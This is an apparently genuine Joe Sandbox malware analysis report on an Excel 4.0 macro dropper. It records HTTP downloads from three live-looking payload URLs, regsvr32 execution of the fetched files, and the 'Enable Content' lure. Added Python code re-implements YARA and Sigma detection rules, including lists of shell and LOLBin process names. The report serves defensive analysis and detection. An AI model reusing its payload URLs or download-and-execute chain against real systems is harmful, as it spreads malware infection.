Windows Analysis Report doc-220808714.xls

Overview

General Information

Sample Name: doc-220808714.xls
Analysis ID: 501226
MD5: 2654fdca7197f542cbd0be823a2a2a9f
SHA1: 149b43a5f8f4d9bd63720b408f6c4e2a86401c6a
SHA256: f5a313c5353ae0d1cede7bd5e234bfd3a4d7abb5e877bd2903d8d7572e9ee4d6

Detection

Hidden Macro 4.0
Score: 76 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1212 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1444 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2792 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: doc-220808714.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0: $header_docf: D0 CF 11 E0
  • 0x384aa: $s1: Excel
  • 0x39557: $s1: Excel
  • 0x34eb: $Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Source: doc-220808714.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security
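The SUSP_Excel4Macro_AutoOpen hit above rests on three strings: the Compound File header, the literal "Excel", and a 21-byte BIFF NAME (Lbl) record that defines the built-in name Auto_Open (record type 0x0018, grbit 0x0020 = fBuiltin, a one-character name whose byte 0x01 is the Auto_Open id, followed by 0x3A, the first token of the formula it points at). The Python below is an added example, not code from Joe Sandbox or from the rule's author: it re-implements that match over raw bytes, generalises it to Auto_Close (id 0x02) and to any cb, cce and itab values, and reports whether the defined name itself is hidden. The record layout follows the [MS-XLS] Lbl definition; the input blobs are constructed test data, not the sample analysed here.

```python
import re
import struct

# First four bytes of the OLE2 / Compound File header (the rule's $header_docf).
OLE_MAGIC = b"\xD0\xCF\x11\xE0"
FBUILTIN = 0x0020  # grbit bit: the name is one of Excel's built-in names
FHIDDEN = 0x0001   # grbit bit: the defined name is hidden from the Name Manager
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close"}

# A BIFF8 Lbl (NAME) record whose name is a single 8-bit character:
#   rt=0x0018, cb, grbit, chKey, cch=1, cce, ixals, itab,
#   cchCustMenu, cchDescription, cchHelptopic, cchStatustext,
#   string flags byte 0x00 (compressed), then the one-byte name.
# With fBuiltin set that byte is the built-in name id (0x01 Auto_Open, 0x02 Auto_Close).
_NAME_RE = re.compile(
    rb"\x18\x00(?P<cb>..)(?P<grbit>..)(?P<chkey>.)\x01(?P<cce>..)(?P<ixals>..)(?P<itab>..)"
    rb"\x00\x00\x00\x00\x00(?P<name>[\x01\x02])",
    re.DOTALL,
)


def find_auto_names(data: bytes) -> list:
    """Return every built-in Auto_Open/Auto_Close NAME record found by a raw byte scan."""
    hits = []
    for m in _NAME_RE.finditer(data):
        grbit = struct.unpack("<H", m.group("grbit"))[0]
        if not grbit & FBUILTIN:
            continue  # a user-defined one-character name, not an auto-run name
        hits.append({
            "offset": m.start(),
            "name": BUILTIN_NAMES[m.group("name")[0]],
            "hidden": bool(grbit & FHIDDEN),
            "itab": struct.unpack("<H", m.group("itab"))[0],  # 0 = workbook-global scope
        })
    return hits


def scan(data: bytes) -> dict:
    """Mirror the rule's three conditions and report which of them matched."""
    return {
        "ole_header": data.startswith(OLE_MAGIC),
        "mentions_excel": b"Excel" in data,
        "auto_names": find_auto_names(data),
    }


def is_suspicious(data: bytes) -> bool:
    r = scan(data)
    return r["ole_header"] and r["mentions_excel"] and bool(r["auto_names"])


# Constructed test blobs (not real workbooks): OLE magic, an "Excel" string and a
# NAME record. RULE_BYTES is exactly the $Auto_Open sequence from the YARA rule;
# the zero filler stands in for the rest of the formula (rgce) and other records.
RULE_BYTES = bytes.fromhex("18001700200000010700000000000000000000013A")
FILLER = b"\x00" * 16

SAMPLE_XLS4 = OLE_MAGIC + b"\xA1\xB1\x1A\xE1" + FILLER + b"Microsoft Excel" + FILLER + RULE_BYTES + FILLER
# Same record with grbit = 0x0021: built-in AND hidden name.
SAMPLE_HIDDEN = SAMPLE_XLS4.replace(RULE_BYTES, bytes.fromhex("18001700210000010700000000000000000000013A"))
# Same bytes with fBuiltin clear: a user-defined one-character name, not Auto_Open.
SAMPLE_USER_NAME = SAMPLE_XLS4.replace(RULE_BYTES, bytes.fromhex("18001700000000010700000000000000000000013A"))
# OLE file that mentions Excel but carries no NAME record at all.
SAMPLE_NO_NAME = OLE_MAGIC + FILLER + b"Excel" + FILLER

if __name__ == "__main__":
    for label, blob in [("rule bytes", SAMPLE_XLS4), ("hidden", SAMPLE_HIDDEN),
                        ("user name", SAMPLE_USER_NAME), ("no name", SAMPLE_NO_NAME)]:
        print(f"{label:10s} suspicious={is_suspicious(blob)} {find_auto_names(blob)}")
```

Like the YARA rule, this is a raw scan of the compound file rather than a parse of the Workbook stream, so it misses a NAME record that straddles a 512-byte sector boundary or a name stored as UTF-16, and it says nothing about what the macro does; for triage of a real sample, extract and read the formulas with a BIFF-aware tool such as oletools' olevba. Note also that the hidden bit reported here belongs to the defined name, whereas the "hidden Macro 4.0" detection refers to the macro sheet's visibility, which is recorded in the BOUNDSHEET record.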

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Command Line Without DLL
Source: Process started | Author: Florian Roth
Data:
  Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
  CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\System32\regsvr32.exe
  NewProcessName: C:\Windows\System32\regsvr32.exe
  OriginalFileName: C:\Windows\System32\regsvr32.exe
  ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  ParentProcessId: 508
  ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
  ProcessId: 1212
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data: the same process-start event as above (ProcessId: 1212, ParentProcessId: 508)
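Both Sigma hits fire on one event: EXCEL.EXE (PID 508) starting regsvr32.exe (PID 1212) with C:\Datop\test.test, a file whose extension is neither .dll nor anything else regsvr32 is normally asked to register. The Python below is an added example, not code from Joe Sandbox or from the Sigma rule authors; it encodes both rules and runs them over a small list of constructed process-creation events (the first three copy the PIDs and command lines from this report, with the single-quote rendering the report uses; the rest are made-up controls). The parent and child image lists are abridged from the public rules and are assumptions to be adjusted to the rule versions you deploy.

```python
import re
from dataclasses import dataclass

# Abridged from the public Sigma rules (assumption): Office parents and the
# shell / LOLBin children the second rule looks for.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "outlook.exe", "visio.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "regsvr32.exe",
                  "rundll32.exe", "mshta.exe", "msiexec.exe", "wmic.exe", "schtasks.exe"}
# Extensions a legitimate regsvr32 invocation is expected to register.
DLL_LIKE_EXT = (".dll", ".ocx", ".ax", ".cpl")

# One token per quoted string (double or single quotes) or run of non-blanks.
_TOKEN_RE = re.compile(r"""\"[^"]*\"|'[^']*'|\S+""")


@dataclass
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _args(command_line: str) -> list:
    """argv[1:] of a Windows command line, with quoted tokens kept whole."""
    tokens = [t.strip("\"'") for t in _TOKEN_RE.findall(command_line)]
    return tokens[1:]


def regsvr32_without_dll(ev: ProcessEvent) -> bool:
    """regsvr32.exe whose non-switch arguments do not end in a registrable extension.

    Checked per token rather than as a substring of the whole command line, so a
    path such as C:\\Datop.dll\\test.test cannot slip past the rule.
    """
    if _basename(ev.image) != "regsvr32.exe":
        return False
    targets = [a for a in _args(ev.command_line) if not a.startswith(("/", "-"))]
    return not any(t.lower().endswith(DLL_LIKE_EXT) for t in targets)


def office_spawning_shell(ev: ProcessEvent) -> bool:
    return (_basename(ev.parent_image) in OFFICE_PARENTS
            and _basename(ev.image) in SHELL_CHILDREN)


RULES = {
    "Regsvr32 Command Line Without DLL": regsvr32_without_dll,
    "Microsoft Office Product Spawning Windows Shell": office_spawning_shell,
}


def evaluate(events) -> list:
    """Return (pid, rule title) for every rule that fires on every event."""
    return [(ev.pid, title) for ev in events for title, rule in RULES.items() if rule(ev)]


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
REGSVR = r"C:\Windows\System32\regsvr32.exe"

# Constructed events. The first three reproduce the process tree in this report
# (PIDs 508 -> 1212, 1444, 2792); the remaining three are made-up controls.
SAMPLE_EVENTS = [
    ProcessEvent(1212, REGSVR, f"'{REGSVR}' C:\\Datop\\test.test", 508, EXCEL),
    ProcessEvent(1444, REGSVR, f"'{REGSVR}' C:\\Datop\\test1.test", 508, EXCEL),
    ProcessEvent(2792, REGSVR, f"'{REGSVR}' C:\\Datop\\test2.test", 508, EXCEL),
    # Benign: an installer registering a real COM server (path with a space).
    ProcessEvent(3001, REGSVR, f'"{REGSVR}" /s "C:\\Program Files\\Vendor\\codec.dll"',
                 900, r"C:\Windows\System32\msiexec.exe"),
    # Benign: Excel starting a non-shell helper process.
    ProcessEvent(3002, r"C:\Windows\splwow64.exe", "splwow64.exe 8192", 508, EXCEL),
    # Evasion attempt: ".dll" buried in a directory name, payload still not a DLL.
    ProcessEvent(3003, REGSVR, f"'{REGSVR}' C:\\Datop.dll\\test.test", 508, EXCEL),
]

if __name__ == "__main__":
    for pid, title in evaluate(SAMPLE_EVENTS):
        print(f"PID {pid}: {title}")
```

The regsvr32 check tests the extension of each non-switch argument instead of searching the whole command line for ".dll", which is why event 3003 (a ".dll" inside a directory name) still fires while event 3001, an installer registering a real COM server, does not. Tune SHELL_CHILDREN and OFFICE_PARENTS against your own process telemetry before deploying; the lists here are illustrative.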

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: doc-220808714.xls | Virustotal: Detection: 13%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 172.93.99.178:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 101.0.112.4:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 108.179.242.179:443 -> 192.168.2.22:49167 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 172.93.99.178:443
Source: global traffic | DNS query: name: ohemaa.org
Source: global traffic | HTTP traffic detected: GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: ohemaa.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: madieandme.com.au | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: amerident.com.do | Connection: Keep-Alive
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View | IP Address: 172.93.99.178
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.464219880.0000000003B40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436153792.0000000003A40000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.463583837.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.435414226.0000000001CC0000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.464219880.0000000003B40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436153792.0000000003A40000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.448307435.0000000003A50000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ocrafhh[1].htm
Source: unknown | DNS traffic detected: queries for: ohemaa.org

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
Source: Screenshot number: 4 | Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing 18 19 I OK I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
Source: Screenshot number: 8 | Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
Source: doc-220808714.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: doc-220808714.xls | OLE indicator, VBA macros: true
Source: doc-220808714.xls | Virustotal: Detection: 13%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: doc-220808714.xls | OLE indicator, Workbook stream: true
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVREB19.tmp
Source: classification engine | Classification label: mal76.expl.winXLS@7/0@3/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (14 occurrences)
Source: C:\Windows\System32\regsvr32.exe TID: 1848 | Thread sleep count: 39 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 2408 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1068 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1960 | Thread sleep time: -60000s >= -30000s

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match | File source: doc-220808714.xls, type: SAMPLE

Mitre Att&ck Matrix

Techniques flagged by the analysis, grouped by tactic (number of hits in parentheses):

Execution: Scripting (1), Exploitation for Client Execution (23)
Privilege Escalation: Process Injection (1)
Defense Evasion: Disable or Modify Tools (1), Virtualization/Sandbox Evasion (1), Process Injection (1), Scripting (1)
Discovery: Virtualization/Sandbox Evasion (1), File and Directory Discovery (1), System Information Discovery (2)
Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (13), Ingress Tool Transfer (2)

No techniques were flagged under Initial Access, Persistence, Credential Access, Lateral Movement, Collection, Exfiltration, Network Effects, Remote Service Effects or Impact.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
doc-220808714.xls | 13% | Virustotal | -

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
ohemaa.org | 0% | Virustotal | -

URLs

Source | Detection | Scanner | Label
https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.html | 0% | Avira URL Cloud | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.html | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
https://amerident.com.do/xdOMlaB0XJ7/ocraf.html | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ohemaa.org | 172.93.99.178 | true | false | - | unknown
amerident.com.do | 108.179.242.179 | true | false | - | unknown
madieandme.com.au | 101.0.112.4 | true | false | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.html | false | Avira URL Cloud: safe | unknown
https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.html | false | Avira URL Cloud: safe | unknown
https://amerident.com.do/xdOMlaB0XJ7/ocraf.html | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmp | false | - | high
http://www.windows.com/pctv. | regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | false | - | high
http://investor.msn.com | regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | false | - | high
http://www.icra.org/vocabulary/. | regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000003.00000002.464219880.0000000003B40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436153792.0000000003A40000.00000002.00020000.sdmp | false | - | high
http://investor.msn.com/ | regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | false | - | high
http://www.%s.comPA | regsvr32.exe, 00000003.00000002.464219880.0000000003B40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436153792.0000000003A40000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.448307435.0000000003A50000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmp | false | - | high
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.463583837.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.435414226.0000000001CC0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
101.0.112.4 | madieandme.com.au | Australia | 55803 | DIGITALPACIFIC-AU DigitalPacificPtyLtdAustralia, AU | false
108.179.242.179 | amerident.com.do | United States | 46606 | UNIFIEDLAYER-AS-1, US | false
172.93.99.178 | ohemaa.org | United States | 23470 | RELIABLESITE, US | false

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 501226
Start date: 12.10.2021
Start time: 17:12:45
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 46s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: doc-220808714.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.winXLS@7/0@3/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe

Simulations

Behavior and APIs

Time | Type | Description
17:13:29 | API Interceptor | 217x Sleep call for process: regsvr32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      108.179.242.179414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                        414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                          172.93.99.178430#U0437.jsGet hashmaliciousBrowse
                          • globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
                          430#U0437.jsGet hashmaliciousBrowse
                          • globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
                          34029.docGet hashmaliciousBrowse
